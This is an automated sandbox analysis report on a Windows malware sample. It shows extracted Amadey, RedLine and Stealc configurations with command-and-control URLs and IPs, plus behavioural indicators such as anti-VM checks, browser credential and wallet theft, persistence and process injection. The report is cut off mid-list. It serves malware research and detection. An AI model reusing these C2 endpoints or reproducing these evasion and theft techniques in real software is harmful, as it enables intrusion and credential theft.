Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
09/08/2024, 08:54
Static task
static1
Behavioral task
behavioral1
Sample
343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral2
Sample
343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe
Resource
win11-20240802-en
General
-
Target
343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe
-
Size
941KB
-
MD5
f5b93d3369d1ae23d6e150e75d2b6a80
-
SHA1
6f6914770748ad148154e1576d9c6fe6887f2290
-
SHA256
343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81
-
SHA512
dcedaed2df62386b980cc1957f224fc48224aeb0f5bf8d0241acc7a0a552b0ae90697ed333189963540f8391cbecfa0977a8685723c5025c9a4f95918032cf1e
-
SSDEEP
12288:pX8RkdnkRZOwECM98hfcunLIYCx28xur5GbYkpMalQBEnxSSraaoKZ2A:SRPRAqM98qCRCxnx7YpauBML
Malware Config
Extracted
amadey
4.41
2da029
http://api.garageserviceoperation.com
-
install_dir
69c36458f5
-
install_file
ednfosi.exe
-
strings_key
0abf6f7bfab99a62ed876fec107361d0
-
url_paths
/CoreOPT/index.php
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
redline
LiveTraffic
20.52.165.210:39030
Extracted
redline
185.215.113.67:21405
Extracted
stealc
default
http://185.215.113.17
-
url_path
/2fb6c2cc8dce150a.php
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral1/memory/2252-118-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral1/memory/3812-217-0x0000000000810000-0x0000000000862000-memory.dmp family_redline -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 037281a4eb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 3684 powershell.exe 4088 powershell.exe 4584 powershell.exe 952 powershell.exe 3132 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 037281a4eb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 037281a4eb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation ednfosi.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation 037281a4eb.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation axplong.exe -
Drops startup file 6 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ftskY3m8GsW5d8SctqVF8lVF.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZFoQLjZwEluiFOIoc6GdH2lR.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSP1hi2IvloSEUMGl0DqekT3.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SsF2bznsNPOYO8Hswra7Tbgm.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n1cgyfXcoHFRxtFsSJ9mZK7Z.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HTgh3dY6taHIWTkQbPQUMeB0.bat CasPol.exe -
Executes dropped EXE 25 IoCs
pid Process 2452 ednfosi.exe 4120 ednfosi.exe 392 037281a4eb.exe 4180 kitty.exe 1256 axplong.exe 4344 ufileee.exe 2416 oDEFNRg49DXhDGsyNPUDYfRd.exe 1828 Operation6572.exe 820 axplong.exe 4796 ednfosi.exe 756 qi8j6Qm0T07Znl95ddV2pQrt.exe 4220 Install.exe 244 Install.exe 2600 Hkbsse.exe 2792 X1X1y5g7fQ.exe 4068 pZITMGCoo2.exe 1612 NR0IP8IgPDsKYeCqF2QdARha.exe 5080 Install.exe 1060 pkdbPxZFwyrmcEjaoWyOHETq.exe 740 Install.exe 4008 ednfosi.exe 4956 axplong.exe 1832 Hkbsse.exe 1464 Install.exe 3436 ednfosi.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Wine 037281a4eb.exe Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Wine axplong.exe -
Indirect Command Execution 1 TTPs 17 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 1240 forfiles.exe 1252 forfiles.exe 3004 forfiles.exe 2252 forfiles.exe 3596 forfiles.exe 5032 forfiles.exe 228 forfiles.exe 4092 forfiles.exe 2644 forfiles.exe 2496 forfiles.exe 4028 forfiles.exe 1840 forfiles.exe 1672 forfiles.exe 4124 forfiles.exe 4644 forfiles.exe 3608 forfiles.exe 2708 forfiles.exe -
Loads dropped DLL 2 IoCs
pid Process 1984 stealc_default.exe 1984 stealc_default.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
flow ioc 90 raw.githubusercontent.com 96 pastebin.com 102 raw.githubusercontent.com 52 raw.githubusercontent.com 53 raw.githubusercontent.com 56 pastebin.com 57 pastebin.com 70 raw.githubusercontent.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 392 037281a4eb.exe 820 axplong.exe 4956 axplong.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 4544 set thread context of 4308 4544 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 86 PID 2452 set thread context of 4120 2452 ednfosi.exe 91 PID 2192 set thread context of 2252 2192 GOLD.exe 102 PID 4344 set thread context of 5092 4344 ufileee.exe 104 PID 2928 set thread context of 632 2928 crypteda.exe 120 PID 4908 set thread context of 872 4908 umrfile%20.exe 156 PID 4796 set thread context of 4008 4796 ednfosi.exe 151 -
Drops file in Windows directory 5 IoCs
description ioc Process File created C:\Windows\Tasks\ednfosi.job 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe File created C:\Windows\Tasks\axplong.job 037281a4eb.exe File created C:\Windows\Tasks\Hkbsse.job newalp.exe File created C:\Windows\Tasks\bvobQgTgLADiTwblyc.job schtasks.exe File opened for modification C:\Windows\Tasks\bvobQgTgLADiTwblyc.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5036 4180 WerFault.exe 93 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pZITMGCoo2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ednfosi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kitty.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hkbsse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ednfosi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypteda.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 037281a4eb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language X1X1y5g7fQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NR0IP8IgPDsKYeCqF2QdARha.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ednfosi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 06082025.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ednfosi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GOLD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 stealc_default.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString stealc_default.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 pkdbPxZFwyrmcEjaoWyOHETq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString pkdbPxZFwyrmcEjaoWyOHETq.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 48 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = fb9a790967add111abcd00c04fc30936ac0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer Install.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1128 schtasks.exe 1264 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 57 IoCs
pid Process 4544 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 4544 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 4544 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 4544 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 2452 ednfosi.exe 2452 ednfosi.exe 2452 ednfosi.exe 2452 ednfosi.exe 392 037281a4eb.exe 392 037281a4eb.exe 4796 ednfosi.exe 820 axplong.exe 820 axplong.exe 1828 Operation6572.exe 1828 Operation6572.exe 4088 powershell.exe 4088 powershell.exe 4088 powershell.exe 4584 powershell.exe 4584 powershell.exe 4584 powershell.exe 4796 ednfosi.exe 4796 ednfosi.exe 4796 ednfosi.exe 4796 ednfosi.exe 2792 X1X1y5g7fQ.exe 2792 X1X1y5g7fQ.exe 2252 RegAsm.exe 2252 RegAsm.exe 4068 pZITMGCoo2.exe 4068 pZITMGCoo2.exe 1984 stealc_default.exe 1984 stealc_default.exe 3812 06082025.exe 3812 06082025.exe 3812 06082025.exe 3812 06082025.exe 3812 06082025.exe 3812 06082025.exe 2252 RegAsm.exe 2252 RegAsm.exe 2252 RegAsm.exe 952 powershell.exe 2252 RegAsm.exe 952 powershell.exe 952 powershell.exe 1984 stealc_default.exe 1984 stealc_default.exe 3132 powershell.exe 3132 powershell.exe 3132 powershell.exe 3436 ednfosi.exe 4956 axplong.exe 4956 axplong.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4544 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe Token: SeDebugPrivilege 2452 ednfosi.exe Token: SeDebugPrivilege 5092 CasPol.exe Token: SeDebugPrivilege 4796 ednfosi.exe Token: SeDebugPrivilege 1828 Operation6572.exe Token: SeBackupPrivilege 1828 Operation6572.exe Token: SeSecurityPrivilege 1828 Operation6572.exe Token: SeSecurityPrivilege 1828 Operation6572.exe Token: SeSecurityPrivilege 1828 Operation6572.exe Token: SeSecurityPrivilege 1828 Operation6572.exe Token: SeDebugPrivilege 2792 X1X1y5g7fQ.exe Token: SeBackupPrivilege 2792 X1X1y5g7fQ.exe Token: SeSecurityPrivilege 2792 X1X1y5g7fQ.exe Token: SeSecurityPrivilege 2792 X1X1y5g7fQ.exe Token: SeSecurityPrivilege 2792 X1X1y5g7fQ.exe Token: SeSecurityPrivilege 2792 X1X1y5g7fQ.exe Token: SeDebugPrivilege 4068 pZITMGCoo2.exe Token: SeBackupPrivilege 4068 pZITMGCoo2.exe Token: SeSecurityPrivilege 4068 pZITMGCoo2.exe Token: SeSecurityPrivilege 4068 pZITMGCoo2.exe Token: SeSecurityPrivilege 4068 pZITMGCoo2.exe Token: SeSecurityPrivilege 4068 pZITMGCoo2.exe Token: SeDebugPrivilege 4088 powershell.exe Token: SeDebugPrivilege 4584 powershell.exe Token: SeIncreaseQuotaPrivilege 2180 WMIC.exe Token: SeSecurityPrivilege 2180 WMIC.exe Token: SeTakeOwnershipPrivilege 2180 WMIC.exe Token: SeLoadDriverPrivilege 2180 WMIC.exe Token: SeSystemProfilePrivilege 2180 WMIC.exe Token: SeSystemtimePrivilege 2180 WMIC.exe Token: SeProfSingleProcessPrivilege 2180 WMIC.exe Token: SeIncBasePriorityPrivilege 2180 WMIC.exe Token: SeCreatePagefilePrivilege 2180 WMIC.exe Token: SeBackupPrivilege 2180 WMIC.exe Token: SeRestorePrivilege 2180 WMIC.exe Token: SeShutdownPrivilege 2180 WMIC.exe Token: SeDebugPrivilege 2180 WMIC.exe Token: SeSystemEnvironmentPrivilege 2180 WMIC.exe Token: SeRemoteShutdownPrivilege 2180 WMIC.exe Token: SeUndockPrivilege 2180 WMIC.exe Token: SeManageVolumePrivilege 2180 WMIC.exe Token: 33 2180 WMIC.exe Token: 34 2180 WMIC.exe Token: 35 2180 WMIC.exe Token: 36 2180 WMIC.exe Token: SeIncreaseQuotaPrivilege 2180 WMIC.exe Token: SeSecurityPrivilege 2180 WMIC.exe Token: SeTakeOwnershipPrivilege 2180 WMIC.exe Token: SeLoadDriverPrivilege 2180 WMIC.exe Token: SeSystemProfilePrivilege 2180 WMIC.exe Token: SeSystemtimePrivilege 2180 WMIC.exe Token: SeProfSingleProcessPrivilege 2180 WMIC.exe Token: SeIncBasePriorityPrivilege 2180 WMIC.exe Token: SeCreatePagefilePrivilege 2180 WMIC.exe Token: SeBackupPrivilege 2180 WMIC.exe Token: SeRestorePrivilege 2180 WMIC.exe Token: SeShutdownPrivilege 2180 WMIC.exe Token: SeDebugPrivilege 2180 WMIC.exe Token: SeSystemEnvironmentPrivilege 2180 WMIC.exe Token: SeRemoteShutdownPrivilege 2180 WMIC.exe Token: SeUndockPrivilege 2180 WMIC.exe Token: SeManageVolumePrivilege 2180 WMIC.exe Token: 33 2180 WMIC.exe Token: 34 2180 WMIC.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4308 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 460 newalp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4544 wrote to memory of 4308 4544 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 86 PID 4544 wrote to memory of 4308 4544 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 86 PID 4544 wrote to memory of 4308 4544 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 86 PID 4544 wrote to memory of 4308 4544 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 86 PID 4544 wrote to memory of 4308 4544 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 86 PID 4544 wrote to memory of 4308 4544 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 86 PID 4544 wrote to memory of 4308 4544 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81.exe 86 PID 4544 wrote to memory of 4308 4544 